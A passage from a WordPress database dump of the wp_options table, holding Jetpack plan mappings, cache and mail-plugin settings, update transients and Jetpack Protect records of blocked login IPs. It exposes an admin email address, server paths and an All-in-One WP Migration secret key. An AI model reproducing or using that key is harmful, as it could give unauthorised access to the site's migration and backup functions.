6:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:17:\"full-activity-log\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:16:\"google-analytics\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:9:\"opentable\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:16:\"priority_support\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:4:\"scan\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:15:\"simple-payments\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:18:\"social-shares-1000\";a:6:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";}s:28:\"subscriber-unlimited-imports\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:7:\"support\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:29:\"vaultpress-automated-restores\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:25:\"vaultpress-backup-archive\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:18:\"vaultpress-backups\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:24:\"vaultpress-storage-space\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:13:\"video-hosting\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:10:\"videopress\";a:8:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:16:\"jetpack_complete\";i:7;s:24:\"jetpack_complete_monthly\";}s:22:\"videopress-1tb-storage\";a:6:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";}s:16:\"videopress/video\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:7:\"wordads\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:15:\"wordads-jetpack\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:6:\"search\";a:4:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:16:\"jetpack_complete\";i:3;s:24:\"jetpack_complete_monthly\";}s:18:\"google-my-business\";a:11:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:25:\"jetpack_security_realtime\";i:3;s:33:\"jetpack_security_realtime_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";i:6;s:29:\"jetpack_security_t1_bi_yearly\";i:7;s:26:\"jetpack_security_t1_yearly\";i:8;s:27:\"jetpack_security_t1_monthly\";i:9;s:26:\"jetpack_security_t2_yearly\";i:10;s:27:\"jetpack_security_t2_monthly\";}s:9:\"polldaddy\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:15:\"personal-themes\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:14:\"premium-themes\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:17:\"real-time-backups\";a:11:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:25:\"jetpack_security_realtime\";i:3;s:33:\"jetpack_security_realtime_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";i:6;s:29:\"jetpack_security_t1_bi_yearly\";i:7;s:26:\"jetpack_security_t1_yearly\";i:8;s:27:\"jetpack_security_t1_monthly\";i:9;s:26:\"jetpack_security_t2_yearly\";i:10;s:27:\"jetpack_security_t2_monthly\";}s:28:\"vaultpress-security-scanning\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:18:\"cloud-critical-css\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:17:\"image-cdn-quality\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:19:\"image-size-analysis\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:14:\"instant-search\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:19:\"performance-history\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:26:\"social-enhanced-publishing\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:10:\"stats-paid\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}}}}','yes'),(12978,'wpcom_publish_posts_with_markdown','1','yes'),(13951,'jetpack_sync_settings_checksum_disable','0','yes'),(14057,'rt_wp_nginx_helper_options','a:19:{s:12:\"enable_purge\";i:1;s:12:\"cache_method\";s:12:\"enable_redis\";s:10:\"enable_map\";i:0;s:10:\"enable_log\";i:0;s:12:\"enable_stamp\";i:0;s:22:\"purge_homepage_on_edit\";i:1;s:21:\"purge_homepage_on_del\";i:1;s:21:\"purge_archive_on_edit\";i:1;s:20:\"purge_archive_on_del\";i:1;s:28:\"purge_archive_on_new_comment\";i:0;s:32:\"purge_archive_on_deleted_comment\";i:0;s:17:\"purge_page_on_mod\";i:1;s:25:\"purge_page_on_new_comment\";i:1;s:29:\"purge_page_on_deleted_comment\";i:1;s:12:\"purge_method\";s:11:\"get_request\";s:9:\"purge_url\";s:0:\"\";s:14:\"redis_hostname\";s:9:\"127.0.0.1\";s:10:\"redis_port\";s:4:\"6379\";s:12:\"redis_prefix\";s:12:\"nginx-cache:\";}','no'),(14414,'pand-d83e5fe4823f8f867dc30d3bb0b6c7de','1623499777','no'),(19421,'feedback_unread_count','0','yes'),(19751,'autoptimize_js_defer_not_aggregate','','yes'),(20045,'auto_update_core_dev','enabled','yes'),(20046,'auto_update_core_minor','enabled','yes'),(20047,'auto_update_core_major','unset','yes'),(25708,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25709,'wp_force_deactivated_plugins','a:0:{}','yes'),(26175,'wp_mail_smtp_activated','a:1:{s:4:\"lite\";i:1627065629;}','yes'),(26212,'wp_mail_smtp_debug','a:0:{}','no'),(26213,'wp_mail_smtp_lite_sent_email_counter','3701','yes'),(26224,'new_admin_email','dhiraj@wthtest1.in8.cdn-alpha.com','yes'),(36623,'wp_cli_login','{\"endpoint\":\"1949d320\",\"version\":\"^1.2\"}','yes'),(42848,'https_detection_errors','a:0:{}','yes'),(42852,'action_scheduler_migration_status','complete','yes'),(50941,'user_count','1','no'),(50976,'autoptimize_installed_before_compatibility','1','yes'),(50995,'jetpack_search_plan_info','a:3:{s:23:\"supports_instant_search\";b:0;s:28:\"supports_only_classic_search\";b:0;s:15:\"supports_search\";b:0;}','yes'),(50998,'jetpack_sync_settings_dedicated_sync_enabled','0','yes'),(51010,'jetpack_package_versions','a:5:{s:6:\"backup\";s:5:\"3.3.0\";s:10:\"connection\";s:5:\"2.3.4\";s:4:\"sync\";s:5:\"2.9.0\";s:6:\"search\";s:6:\"0.43.4\";s:10:\"videopress\";s:6:\"0.23.7\";}','yes'),(51026,'jp_sync_last_success_sync','1712174049.6084','no'),(51027,'wp_mail_smtp_debug_events_db_version','1','yes'),(51175,'wp_mail_smtp_lite_weekly_sent_email_counter','a:12:{i:31;i:5;i:32;i:5;i:33;i:1;i:50;i:2;s:2:\"02\";i:1;s:2:\"07\";i:22;s:2:\"09\";i:13;i:10;i:1;i:11;i:4;i:12;i:12;i:13;i:5;i:14;i:2;}','yes'),(153015,'jp_sync_last_success_immediate-send','1712174049.6002','no'),(158117,'wp_mail_smtp_notifications','a:4:{s:6:\"update\";i:1673998587;s:4:\"feed\";a:1:{i:0;a:6:{s:5:\"title\";s:33:\"Instant Alerts for Email Failures\";s:7:\"content\";s:269:\"Your website emails are critical. If they stop working, wouldn\'t you want to know? With WP Mail SMTP Pro, you can get immediate alerts if there’s a problem sending emails from your site. Get notified via email, SMS, Slack, or webhooks - whatever works best for you!\r\n\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:29;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:176:\"https://wpmailsmtp.com/introducing-wp-mail-smtp-3-5-alert-notifications-are-here/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Alerts\";s:4:\"text\";s:10:\"Learn More\";}s:3:\"alt\";a:2:{s:3:\"url\";s:142:\"https://wpmailsmtp.com/wpmailsmtp-lite-upgrade/?utm_source=WordPress&utm_medium=liteplugin&utm_campaign=Plugin Notification&utm_content=Alerts\";s:4:\"text\";s:14:\"Upgrade to Pro\";}}s:5:\"start\";s:19:\"2022-08-29 00:00:00\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(174378,'jetpack_waf_needs_update','1','yes'),(174679,'ai1wm_secret_key','q3EnZyPiFV4o','yes'),(174680,'ai1wm_backups_labels','a:0:{}','yes'),(174681,'ai1wm_sites_links','a:0:{}','yes'),(174682,'ai1wm_status','a:3:{s:4:\"type\";s:4:\"done\";s:5:\"title\";s:41:\"Your site has been imported successfully!\";s:7:\"message\";s:387:\"» <a class=\"ai1wm-no-underline\" href=\"https://wthtest1.in8.cdn-alpha.com/wp-admin/options-permalink.php#submit\" target=\"_blank\">Save permalinks structure</a>. (opens a new window)<br />» <a class=\"ai1wm-no-underline\" href=\"https://wordpress.org/support/view/plugin-reviews/all-in-one-wp-migration?rate=5#postform\" target=\"_blank\">Optionally, review the plugin</a>. (opens a new window)\";}','yes'),(174683,'swift_performance_plugin_organizer','a:0:{}','yes'),(174699,'_transient_jetpack_autoloader_plugin_paths','a:1:{i:0;s:25:\"{{WP_PLUGIN_DIR}}/jetpack\";}','yes'),(174701,'et_pb_contact_form_88bb9ca8064fc2cac48a33995a8737a8','off','yes'),(174863,'_site_transient_ai1wm_last_check_for_updates','1708468649','no'),(175194,'_transient_dirsize_cache','a:14:{s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2023/04\";i:0;s:60:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2023\";i:0;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2020/06\";i:4840460;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2020/05\";i:1003975;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2020/07\";i:12419307;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2020/08\";i:11152969;s:60:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2020\";i:29416711;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/ao_ccss\";i:189;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2021/03\";i:1699600;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2021/07\";i:276847;s:60:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2021\";i:1976447;s:63:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2022/03\";i:10492;s:60:\"/storage/v11800/wthtest1/public_html/wp-content/uploads/2022\";i:10492;s:55:\"/storage/v11800/wthtest1/public_html/wp-content/uploads\";i:31403882;}','yes'),(176373,'_transient_health-check-site-status-result','{\"good\":21,\"recommended\":2,\"critical\":0}','yes'),(178877,'jetpack_sync_dedicated_spawn_lock','1710774930.6356','no'),(196555,'_site_transient_et_update_all_plugins','O:8:\"stdClass\":3:{s:7:\"checked\";a:11:{s:19:\"akismet/akismet.php\";s:5:\"5.3.1\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.79\";s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";s:4:\"2.52\";s:27:\"autoptimize/autoptimize.php\";s:6:\"3.1.10\";s:27:\"comet-cache/comet-cache.php\";s:6:\"170220\";s:23:\"elementor/elementor.php\";s:6:\"3.19.0\";s:39:\"elfsight-popup-cc/elfsight-popup-cc.php\";s:5:\"1.0.0\";s:55:\"elfsight-whatsapp-chat-cc/elfsight-whatsapp-chat-cc.php\";s:5:\"1.1.0\";s:9:\"hello.php\";s:5:\"1.7.2\";s:19:\"jetpack/jetpack.php\";s:4:\"13.0\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:6:\"3.11.1\";}s:8:\"response\";a:0:{}s:12:\"last_checked\";i:1706784060;}','no'),(196569,'_transient_timeout_et_core_version','1712211402','no'),(196570,'_transient_et_core_version','4.5.6','no'),(196593,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1719434940;s:7:\"checked\";a:4:{s:4:\"Divi\";s:5:\"4.5.6\";s:16:\"twentytwentyfour\";s:3:\"1.1\";s:17:\"twentytwentythree\";s:3:\"1.4\";s:15:\"twentytwentytwo\";s:3:\"1.7\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:3:{s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.1\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.1.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.4.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.7.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(196594,'_site_transient_et_update_themes','O:8:\"stdClass\":3:{s:7:\"checked\";a:2:{s:4:\"Divi\";s:5:\"4.5.6\";s:16:\"twentytwentyfour\";s:3:\"1.0\";}s:8:\"response\";a:1:{s:4:\"Divi\";a:3:{s:11:\"new_version\";s:4:\"4.24\";s:5:\"theme\";s:4:\"Divi\";s:3:\"url\";s:52:\"https://www.elegantthemes.com/api/changelog/divi.txt\";}}s:12:\"last_checked\";i:1706784063;}','no'),(200082,'jetpack_sync_settings_custom_queue_table_enabled','0','yes'),(206817,'_transient_jetpack_failed_update_remote_package_versions','1697225496','no'),(218078,'wp_attachment_pages_enabled','1','yes'),(220131,'_transient_timeout_jetpack_https_test_message','1708555056','no'),(220132,'_transient_jetpack_https_test_message','','no'),(223479,'_transient_timeout_jetpack_file_data_13.1.1','1709771517','no'),(223480,'_transient_jetpack_file_data_13.1.1','a:1:{s:32:\"3fd340ad52927afb3bbb9e98575eccfd\";a:15:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:24:\"requires_user_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}}','no'),(226657,'_transient_timeout_jetpack_file_data_13.1.2','1710947842','no'),(226658,'_transient_jetpack_file_data_13.1.2','a:1:{s:32:\"3fd340ad52927afb3bbb9e98575eccfd\";a:15:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:24:\"requires_user_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}}','no'),(226697,'_transient_timeout_jetpack_file_data_13.1.3','1710973069','no'),(226700,'_transient_jetpack_file_data_13.1.3','a:1:{s:32:\"3fd340ad52927afb3bbb9e98575eccfd\";a:15:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:24:\"requires_user_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}}','no'),(226745,'_transient_timeout_autoptimize_stats','1708472255','no'),(226746,'_transient_autoptimize_stats','a:3:{i:0;i:235;i:1;i:49548660;i:2;i:1708468655;}','no'),(226747,'_transient_timeout_jetpack_https_test','1708555056','no'),(226748,'_transient_jetpack_https_test','1','no'),(226750,'jetpack_site_products','a:0:{}','yes'),(226752,'_site_transient_timeout_php_check_2f5acf219326a8bc5331ee302b9812f4','1709073459','no'),(226753,'_site_transient_php_check_2f5acf219326a8bc5331ee302b9812f4','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:3:\"7.0\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(226755,'_transient_doing_cron','1719563388.8438389301300048828125','yes'),(226795,'_transient_timeout_jpp_li_425c371f4cd6c01117744142c986d396','1708491499','no'),(226796,'_transient_jpp_li_425c371f4cd6c01117744142c986d396','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:45:\"This IP is currently blocked (50.114.181.237)\";s:17:\"seconds_remaining\";i:3472;s:16:\"blocked_attempts\";s:5:\"40533\";s:6:\"expire\";i:1708491499;}','no'),(226885,'_transient_timeout_jpp_li_48af725ae8bf8a86f845f4a4926eed16','1708553614','no'),(226886,'_transient_jpp_li_48af725ae8bf8a86f845f4a4926eed16','a:5:{s:6:\"status\";s:12:\"blocked-hard\";s:3:\"msg\";s:42:\"This IP is currently blocked (185.70.95.8)\";s:17:\"seconds_remaining\";i:686;s:16:\"blocked_attempts\";s:5:\"40535\";s:6:\"expire\";i:1708553614;}','no'),(226979,'_transient_timeout_jpp_li_66c73daa364325c6cf56cf5495bb9f97','1708635325','no'),(226980,'_transient_jpp_li_66c73daa364325c6cf56cf5495bb9f97','a:5:{s:6:\"status\";s:2:\"ok\";s:3:\"msg\";s:53:\"No current blocks on this IP address (77.105.167.205)\";s:17:\"seconds_remaining\";i:3600;s:16:\"blocked_attempts\";s:5:\"40536\";s:6:\"expire\";i:1708635325;}','no'),(227037,'_transient_timeout_jpp_li_b3cc1c34f06449fde4b324d83a4c2809','1708660004','no'),(227038,'_transient_jpp_li_b3cc1c34f06449fde4b324d83a4c2809','a:5:{s:6:\"status\";s:7:\"blocked\";s:3:\"msg\";s:46:\"This IP is currently blocked (113.176.222.127)\";s:17:\"seconds_remaining\";i:3513;s:16:\"blocked_attempts\";s:5:\"40536\";s:6:\"expire\";i:1708660004;}','no'),(227075,'_transient_timeout_jpp_li_7bce8b3dd2496e25c4ec10c7aa54d31e','1708678719','no'),(227076,'_transient_jpp_li_7bce8b3dd2496e25c4ec10c7aa54d31e','a:5:{s:6:\"status\";s:7:\"blocked\";s:3:\"msg\";s:45:\"This IP is currently blocked (167.71.222.105)\";s:17:\"seconds_remaining\";i:2806;s:16:\"blocked_attempts\";s:5:\"40537\";s:6:\"expire\";i:1708678719;}','no'),(227112,'_transient_timeout_jpp_li_487ef11c4326bbe56825eb527c46c1fb','1708698790','no'),(227113,'_transient_jpp_li_487ef11c4326bbe56825eb527c46c1fb','a:5:{s:6:\"status\";s:7:\"blocked\";s:3:\"msg\";s:44:\"This IP is currently blocked (91.92.250.182)\";s:17:\"seconds_remaining\";i:168;s:16:\"blocked_attempts\";s:5:\"40538\";s:6:\"expire\";i:1708698790;}','no'),(227198,'_transient_timeout_jpp_li_4eb4c09eb40200e52ec7bf6c1df342e3','1708756865','no'),(227199,'_transient_jpp_li_4eb4c09eb40200e52ec7bf6c1df342e3','a:5:{s:6:\"status\";s:2:\"ok\";s:3:\"msg\";s:53:\"No current blocks on this IP address 